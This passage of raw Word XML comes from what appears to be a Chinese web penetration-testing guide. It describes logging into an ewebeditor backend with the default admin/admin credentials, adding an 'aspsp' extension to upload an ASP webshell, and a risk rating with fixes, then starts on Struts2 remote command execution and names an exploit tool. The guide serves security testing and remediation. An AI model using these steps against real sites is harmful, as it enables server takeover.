      <w:r w:rsidR="00C80FDC" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传漏洞为例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C8EE1F" w14:textId="61FF5BF6" w:rsidR="00EF6D8D" w:rsidRPr="00E04D10" w:rsidRDefault="00EF6D8D" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>通过网站目录扫描工具对网站进行扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，扫到有</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ewebeditor</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的后台，尝试默认口令</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin,admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行登录，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45641386" w14:textId="77777777" w:rsidR="00EF6D8D" w:rsidRPr="00E04D10" w:rsidRDefault="00EF6D8D" w:rsidP="00936DFE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E26EBD" wp14:editId="06BF1218">
            <wp:extent cx="5105400"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762250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61561FE5" w14:textId="1655DBB7" w:rsidR="00EF6D8D" w:rsidRPr="00E04D10" w:rsidRDefault="002C4328" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="00EF6D8D" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样式管理添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>媒体</w:t>
      </w:r>
      <w:r w:rsidR="00EF6D8D" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后缀</w:t>
      </w:r>
      <w:r w:rsidR="00E20828" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00E20828" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>aspsp</w:t>
      </w:r>
      <w:r w:rsidR="00214BD1" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r w:rsidR="00EF6D8D" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r w:rsidR="00214BD1" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asp webshell</w:t>
      </w:r>
      <w:r w:rsidR="00EF6D8D" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62950F3F" w14:textId="6325FE3E" w:rsidR="00C80FDC" w:rsidRPr="00E04D10" w:rsidRDefault="00EF6D8D" w:rsidP="00936DFE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B25D67E" wp14:editId="25A28D52">
            <wp:extent cx="5250412" cy="139065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8.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264011" cy="1394252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B752840" w14:textId="77777777" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00680E2B" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14ACC33C" w14:textId="4D553C0C" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00C24790" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00680E2B" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于开发阶段使用了弱口令，导致正式上线后可通过扫描等方式获取到编辑器后台管理路径</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>通过弱口令进入后台管理</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>为攻击者提供进一步的攻击途径</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>可篡改网站页面内容甚至通过上传</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00BF3865" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA9832" w14:textId="77777777" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00680E2B" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713D8B9E" w14:textId="143C774B" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00B41D6C" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：编辑器存在默认口令，可上传</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61221FA3" w14:textId="77777777" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00680E2B" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B2C34" w14:textId="77777777" w:rsidR="002E14CD" w:rsidRPr="00E04D10" w:rsidRDefault="002E14CD" w:rsidP="00E04D10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改编辑器后台默认路径；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EF335" w14:textId="5A88FB8D" w:rsidR="00680E2B" w:rsidRDefault="002E14CD" w:rsidP="00E04D10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>为编辑器后台设置高复杂度口令</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F5E0A2" w14:textId="39A91F47" w:rsidR="005043FA" w:rsidRPr="00E04D10" w:rsidRDefault="005043FA" w:rsidP="005043FA">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1E4B105" w14:textId="0884DA3D" w:rsidR="005C51DF" w:rsidRPr="00F757E4" w:rsidRDefault="005C51DF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc498434571"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发框架</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="14EED961" w14:textId="292E1B03" w:rsidR="005C51DF" w:rsidRPr="00B90E5F" w:rsidRDefault="005C51DF" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="001C2C1E" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发框架存在的漏洞，如</w:t>
      </w:r>
      <w:r w:rsidR="001C2C1E" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="001C2C1E" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D003BF1" w14:textId="5A93954C" w:rsidR="0092489C" w:rsidRPr="00B90E5F" w:rsidRDefault="005C51DF" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="0092489C" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="0092489C" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="0092489C" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程命令执行为例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B7A9A" w14:textId="5D0845F2" w:rsidR="0092489C" w:rsidRPr="00B90E5F" w:rsidRDefault="0092489C" w:rsidP="002E176A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在了解网站所采用的结构框架后，除去伪静态页面，抓包或者读取页面源代码方式，查找到网站系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.do</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.action</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结尾类型后，添加相应的远程命令执行代码进行判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B68FF" w14:textId="1ED297E6" w:rsidR="0092489C" w:rsidRPr="00B90E5F" w:rsidRDefault="0092489C" w:rsidP="002E176A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如用户可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://host.com/X.action</w:t>
      </w:r>
      <w:r w:rsidR="00E73A41" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后添加相对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的远程命令执行代码，或者直接利用工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K8 Struts2 Exploit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行检测，以下列举几种</w:t>
      </w:r>
      <w:r w:rsidR="00E73A41" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的执行命令</w:t>
      </w:r>
      <w:r w:rsidR="00E73A41" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r w:rsidR="00E73A41" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E288190" w14:textId="77777777" w:rsidR="0092489C" w:rsidRPr="00B90E5F" w:rsidRDefault="0092489C" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA94903" w14:textId="7790E6DB" w:rsidR="005C51DF" w:rsidRPr="00B90E5F" w:rsidRDefault="005C51DF" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFA41B4" w14:textId="0CF56A8E" w:rsidR="005C51DF" w:rsidRPr="00B90E5F" w:rsidRDefault="00C24790" w:rsidP="002E176A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="005C51DF" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="007D01FD" w:rsidRPr="00B90E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts 2</w:t>
